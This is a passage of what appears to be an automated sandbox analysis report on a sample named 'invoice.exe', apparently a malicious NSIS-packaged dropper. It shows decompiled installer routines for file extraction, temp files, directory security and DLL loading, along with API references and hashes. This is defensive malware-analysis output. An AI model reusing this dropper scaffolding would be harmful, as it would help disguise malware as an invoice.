                                            						 *(_t85 + 8) = _t70;
                                            					}
                                            					__eflags =  *(_t85 + 8) - _t75;
                                            					if( *(_t85 + 8) == _t75) {
                                            						E00405AD9(0x40a418);
                                            					}
                                            					__eflags =  *(_t85 + 8) - 1;
                                            					_t41 = E00405AFE(0x40a418, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                            					__eflags = _t41 - 0xffffffff;
                                            					 *(_t85 - 0xc) = _t41;
                                            					if(_t41 != 0xffffffff) {
                                            						break;
                                            					}
                                            					__eflags =  *(_t85 + 8) - _t75;
                                            					if( *(_t85 + 8) != _t75) {
                                            						E0040508C(0xffffffe2,  *(_t85 - 8));
                                            						__eflags =  *(_t85 + 8) - 2;
                                            						if(__eflags == 0) {
                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                            						}
                                            						L31:
                                            						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
                                            						__eflags =  *0x42f4a8;
                                            						goto L32;
                                            					} else {
                                            						E00405F65(0x40ac18, 0x430000);
                                            						E00405F65(0x430000, 0x40a418);
                                            						E00405F87(_t75, 0x40ac18, 0x40a418, "C:\Users\Arthur\AppData\Local\Temp\nstA9F8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                            						E00405F65(0x430000, 0x40ac18);
                                            						_t62 = E00405681("C:\Users\Arthur\AppData\Local\Temp\nstA9F8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                            						__eflags = _t62;
                                            						if(_t62 == 0) {
                                            							continue;
                                            						} else {
                                            							__eflags = _t62 == 1;
                                            							if(_t62 == 1) {
                                            								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
                                            								L32:
                                            								_t49 = 0;
                                            								__eflags = 0;
                                            							} else {
                                            								_push(0x40a418);
                                            								_push(0xfffffffa);
                                            								E0040508C();
                                            								L29:
                                            								_t49 = 0x7fffffff;
                                            							}
                                            						}
                                            					}
                                            					L33:
                                            					return _t49;
                                            				}
                                            				E0040508C(0xffffffea,  *(_t85 - 8));
                                            				 *0x42f4d4 =  *0x42f4d4 + 1;
                                            				_push(_t75);
                                            				_push(_t75);
                                            				_push( *(_t85 - 0xc));
                                            				_push( *((intOrPtr*)(_t85 - 0x20)));
                                            				_t43 = E00402F81(); // executed
                                            				 *0x42f4d4 =  *0x42f4d4 - 1;
                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                            				_t80 = _t43;
                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                            					L22:
                                            					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                            				} else {
                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                            						goto L22;
                                            					}
                                            				}
                                            				CloseHandle( *(_t85 - 0xc)); // executed
                                            				__eflags = _t80 - _t75;
                                            				if(_t80 >= _t75) {
                                            					goto L31;
                                            				} else {
                                            					__eflags = _t80 - 0xfffffffe;
                                            					if(_t80 != 0xfffffffe) {
                                            						E00405F87(_t75, _t80, 0x40a418, 0x40a418, 0xffffffee);
                                            					} else {
                                            						E00405F87(_t75, _t80, 0x40a418, 0x40a418, 0xffffffe9);
                                            						lstrcatA(0x40a418,  *(_t85 - 8));
                                            					}
                                            					_push(0x200010);
                                            					_push(0x40a418);
                                            					E00405681();
                                            					goto L29;
                                            				}
                                            				goto L33;
                                            			}

















                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,00000031), ref: 00401798
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,00000031), ref: 004017C2
                                              • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                              • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                              • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                              • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
                                              • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship$C:\Users\user\AppData\Local\Temp\nstA9F8.tmp$C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll$Call
                                            • API String ID: 1941528284-1600441529
                                            • Opcode ID: 98a1d938c2887b8159c1b5f9a529be0333a72b233cb983e9a9a22398b60c3e71
                                            • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                                            • Opcode Fuzzy Hash: 98a1d938c2887b8159c1b5f9a529be0333a72b233cb983e9a9a22398b60c3e71
                                            • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00402F81(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                            				signed int _v8;
                                            				int _v12;
                                            				intOrPtr _v16;
                                            				long _v20;
                                            				intOrPtr _v24;
                                            				char _v88;
                                            				void* _t65;
                                            				long _t70;
                                            				intOrPtr _t75;
                                            				long _t76;
                                            				intOrPtr _t77;
                                            				void* _t78;
                                            				int _t88;
                                            				intOrPtr _t92;
                                            				intOrPtr _t95;
                                            				long _t96;
                                            				signed int _t97;
                                            				int _t98;
                                            				int _t99;
                                            				intOrPtr _t100;
                                            				void* _t101;
                                            				void* _t102;
                                            
                                            				_t97 = _a16;
                                            				_t92 = _a12;
                                            				_v12 = _t97;
                                            				if(_t92 == 0) {
                                            					_v12 = 0x8000;
                                            				}
                                            				_v8 = _v8 & 0x00000000;
                                            				_v16 = _t92;
                                            				if(_t92 == 0) {
                                            					_v16 = 0x419428;
                                            				}
                                            				_t62 = _a4;
                                            				if(_a4 >= 0) {
                                            					E004031A9( *0x42f478 + _t62);
                                            				}
                                            				if(E00403193( &_a16, 4) == 0) {
                                            					L41:
                                            					_push(0xfffffffd);
                                            					goto L42;
                                            				} else {
                                            					if((_a19 & 0x00000080) == 0) {
                                            						if(_t92 != 0) {
                                            							if(_a16 < _t97) {
                                            								_t97 = _a16;
                                            							}
                                            							if(E00403193(_t92, _t97) != 0) {
                                            								_v8 = _t97;
                                            								L44:
                                            								return _v8;
                                            							} else {
                                            								goto L41;
                                            							}
                                            						}
                                            						if(_a16 <= _t92) {
                                            							goto L44;
                                            						}
                                            						_t88 = _v12;
                                            						while(1) {
                                            							_t98 = _a16;
                                            							if(_a16 >= _t88) {
                                            								_t98 = _t88;
                                            							}
                                            							if(E00403193(0x415428, _t98) == 0) {
                                            								goto L41;
                                            							}
                                            							if(E00405BA5(_a8, 0x415428, _t98) == 0) {
                                            								L28:
                                            								_push(0xfffffffe);
                                            								L42:
                                            								_pop(_t65);
                                            								return _t65;
                                            							}
                                            							_v8 = _v8 + _t98;
                                            							_a16 = _a16 - _t98;
                                            							if(_a16 > 0) {
                                            								continue;
                                            							}
                                            							goto L44;
                                            						}
                                            						goto L41;
                                            					}
                                            					_t70 = GetTickCount();
                                            					 *0x40bd8c =  *0x40bd8c & 0x00000000;
                                            					 *0x40bd88 =  *0x40bd88 & 0x00000000;
                                            					_t14 =  &_a16;
                                            					 *_t14 = _a16 & 0x7fffffff;
                                            					_v20 = _t70;
                                            					 *0x40b870 = 8;
                                            					 *0x415418 = 0x40d410;
                                            					 *0x415414 = 0x40d410;
                                            					 *0x415410 = 0x415410;
                                            					_a4 = _a16;
                                            					if( *_t14 <= 0) {
                                            						goto L44;
                                            					} else {
                                            						goto L9;
                                            					}
                                            					while(1) {
                                            						L9:
                                            						_t99 = 0x4000;
                                            						if(_a16 < 0x4000) {
                                            							_t99 = _a16;
                                            						}
                                            						if(E00403193(0x415428, _t99) == 0) {
                                            							goto L41;
                                            						}
                                            						_a16 = _a16 - _t99;
                                            						 *0x40b860 = 0x415428;
                                            						 *0x40b864 = _t99;
                                            						while(1) {
                                            							_t95 = _v16;
                                            							 *0x40b868 = _t95;
                                            							 *0x40b86c = _v12;
                                            							_t75 = E00406422("?mA");
                                            							_v24 = _t75;
                                            							if(_t75 < 0) {
                                            								break;
                                            							}
                                            							_t100 =  *0x40b868; // 0x41c028
                                            							_t101 = _t100 - _t95;
                                            							_t76 = GetTickCount();
                                            							_t96 = _t76;
                                            							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                            								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                            								_t102 = _t102 + 0xc;
                                            								E0040508C(0,  &_v88);
                                            								_v20 = _t96;
                                            							}
                                            							if(_t101 == 0) {
                                            								if(_a16 > 0) {
                                            									goto L9;
                                            								}
                                            								goto L44;
                                            							} else {
                                            								if(_a12 != 0) {
                                            									_t77 =  *0x40b868; // 0x41c028
                                            									_v8 = _v8 + _t101;
                                            									_v12 = _v12 - _t101;
                                            									_v16 = _t77;
                                            									L23:
                                            									if(_v24 != 1) {
                                            										continue;
                                            									}
                                            									goto L44;
                                            								}
                                            								_t78 = E00405BA5(_a8, _v16, _t101); // executed
                                            								if(_t78 == 0) {
                                            									goto L28;
                                            								}
                                            								_v8 = _v8 + _t101;
                                            								goto L23;
                                            							}
                                            						}
                                            						_push(0xfffffffc);
                                            						goto L42;
                                            					}
                                            					goto L41;
                                            				}
                                            			}

























                                            0x00000000
                                            0x00000000
                                            0x004030f9
                                            0x00000000
                                            0x004030f9
                                            0x004030e1
                                            0x00403124
                                            0x00000000
                                            0x00403124
                                            0x00000000
                                            0x00403031

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: (TA$(TA$... %d%%$?mA
                                            • API String ID: 551687249-1330877741
                                            • Opcode ID: 3a673b9f7453c760f6c1792c8fc342caba0986dfdf2a426a9d97dd1df172e485
                                            • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
                                            • Opcode Fuzzy Hash: 3a673b9f7453c760f6c1792c8fc342caba0986dfdf2a426a9d97dd1df172e485
                                            • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 692 40508c-4050a1 693 405157-40515b 692->693 694 4050a7-4050b9 692->694 695 4050c4-4050d0 lstrlenA 694->695 696 4050bb-4050bf call 405f87 694->696 698 4050d2-4050e2 lstrlenA 695->698 699 4050ed-4050f1 695->699 696->695 698->693 700 4050e4-4050e8 lstrcatA 698->700 701 405100-405104 699->701 702 4050f3-4050fa SetWindowTextA 699->702 700->699 703 405106-405148 SendMessageA * 3 701->703 704 40514a-40514c 701->704 702->701 703->704 704->693 705 40514e-405151 704->705 705->693
                                            C-Code - Quality: 100%
                                            			E0040508C(CHAR* _a4, CHAR* _a8) {
                                            				struct HWND__* _v8;
                                            				signed int _v12;
                                            				CHAR* _v32;
                                            				long _v44;
                                            				int _v48;
                                            				void* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				CHAR* _t26;
                                            				signed int _t27;
                                            				CHAR* _t28;
                                            				long _t29;
                                            				signed int _t39;
                                            
                                            				_t26 =  *0x42ebe4; // 0x103c2
                                            				_v8 = _t26;
                                            				if(_t26 != 0) {
                                            					_t27 =  *0x42f4d4;
                                            					_v12 = _t27;
                                            					_t39 = _t27 & 0x00000001;
                                            					if(_t39 == 0) {
                                            						E00405F87(0, _t39, 0x42a050, 0x42a050, _a4);
                                            					}
                                            					_t26 = lstrlenA(0x42a050);
                                            					_a4 = _t26;
                                            					if(_a8 == 0) {
                                            						L6:
                                            						if((_v12 & 0x00000004) == 0) {
                                            							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050); // executed
                                            						}
                                            						if((_v12 & 0x00000002) == 0) {
                                            							_v32 = 0x42a050;
                                            							_v52 = 1;
                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                            							_v44 = 0;
                                            							_v48 = _t29 - _t39;
                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                            						}
                                            						if(_t39 != 0) {
                                            							_t28 = _a4;
                                            							 *((char*)(_t28 + 0x42a050)) = 0;
                                            							return _t28;
                                            						}
                                            					} else {
                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                            						if(_t26 < 0x800) {
                                            							_t26 = lstrcatA(0x42a050, _a8);
                                            							goto L6;
                                            						}
                                            					}
                                            				}
                                            				return _t26;
                                            			}


















                                            APIs
                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                            • lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll
                                            • API String ID: 2531174081-3733134521
                                            • Opcode ID: 6726e748f555af4487e9f26b6748d9644d7c6f8c225b3de0595c0d78e911238a
                                            • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                                            • Opcode Fuzzy Hash: 6726e748f555af4487e9f26b6748d9644d7c6f8c225b3de0595c0d78e911238a
                                            • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 706 405552-40559d CreateDirectoryA 707 4055a3-4055b0 GetLastError 706->707 708 40559f-4055a1 706->708 709 4055ca-4055cc 707->709 710 4055b2-4055c6 SetFileSecurityA 707->710 708->709 710->708 711 4055c8 GetLastError 710->711 711->709
                                            C-Code - Quality: 100%
                                            			E00405552(CHAR* _a4) {
                                            				struct _SECURITY_ATTRIBUTES _v16;
                                            				struct _SECURITY_DESCRIPTOR _v36;
                                            				int _t22;
                                            				long _t23;
                                            
                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                            				_v36.Owner = 0x408374;
                                            				_v36.Group = 0x408374;
                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                            				_v16.lpSecurityDescriptor =  &_v36;
                                            				_v36.Revision = 1;
                                            				_v36.Control = 4;
                                            				_v36.Dacl = 0x408364;
                                            				_v16.nLength = 0xc;
                                            				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                            				if(_t22 != 0) {
                                            					L1:
                                            					return 0;
                                            				}
                                            				_t23 = GetLastError();
                                            				if(_t23 == 0xb7) {
                                            					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                            						goto L1;
                                            					}
                                            					return GetLastError();
                                            				}
                                            				return _t23;
                                            			}








                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
                                            • GetLastError.KERNEL32 ref: 004055A9
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                                            • GetLastError.KERNEL32 ref: 004055C8
                                            Strings
                                            • C:\Users\user\Desktop, xrefs: 00405552
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                            • API String ID: 3449924974-26219170
                                            • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                            • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                                            • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                            • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 712 40628f-4062af GetSystemDirectoryA 713 4062b1 712->713 714 4062b3-4062b5 712->714 713->714 715 4062c5-4062c7 714->715 716 4062b7-4062bf 714->716 718 4062c8-4062fa wsprintfA LoadLibraryExA 715->718 716->715 717 4062c1-4062c3 716->717 717->718
                                            C-Code - Quality: 100%
                                            			E0040628F(intOrPtr _a4) {
                                            				char _v292;
                                            				int _t10;
                                            				struct HINSTANCE__* _t14;
                                            				void* _t16;
                                            				void* _t21;
                                            
                                            				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                            				if(_t10 > 0x104) {
                                            					_t10 = 0;
                                            				}
                                            				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                            					_t16 = 1;
                                            				} else {
                                            					_t16 = 0;
                                            				}
                                            				_t5 = _t16 + 0x40a014; // 0x5c
                                            				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                            				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                            				return _t14;
                                            			}









                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                            • wsprintfA.USER32 ref: 004062DF
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                            • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                                            • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                            • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 719 405b2d-405b37 720 405b38-405b63 GetTickCount GetTempFileNameA 719->720 721 405b72-405b74 720->721 722 405b65-405b67 720->722 724 405b6c-405b6f 721->724 722->720 723 405b69 722->723 723->724
                                            C-Code - Quality: 100%
                                            			E00405B2D(char _a4, intOrPtr _a6, CHAR* _a8) {
                                            				char _t11;
                                            				signed int _t12;
                                            				int _t15;
                                            				signed int _t17;
                                            				void* _t20;
                                            				CHAR* _t21;
                                            
                                            				_t21 = _a4;
                                            				_t20 = 0x64;
                                            				while(1) {
                                            					_t11 =  *0x40a3b4; // 0x61736e
                                            					_t20 = _t20 - 1;
                                            					_a4 = _t11;
                                            					_t12 = GetTickCount();
                                            					_t17 = 0x1a;
                                            					_a6 = _a6 + _t12 % _t17;
                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                            					if(_t15 != 0) {
                                            						break;
                                            					}
                                            					if(_t20 != 0) {
                                            						continue;
                                            					}
                                            					 *_t21 =  *_t21 & 0x00000000;
                                            					return _t15;
                                            				}
                                            				return _t21;
                                            			}










                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405B41
                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                            • "C:\Users\user\Desktop\invoice.exe", xrefs: 00405B2D
                                            • nsa, xrefs: 00405B38
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2146673014
                                            • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                            • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                                            • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
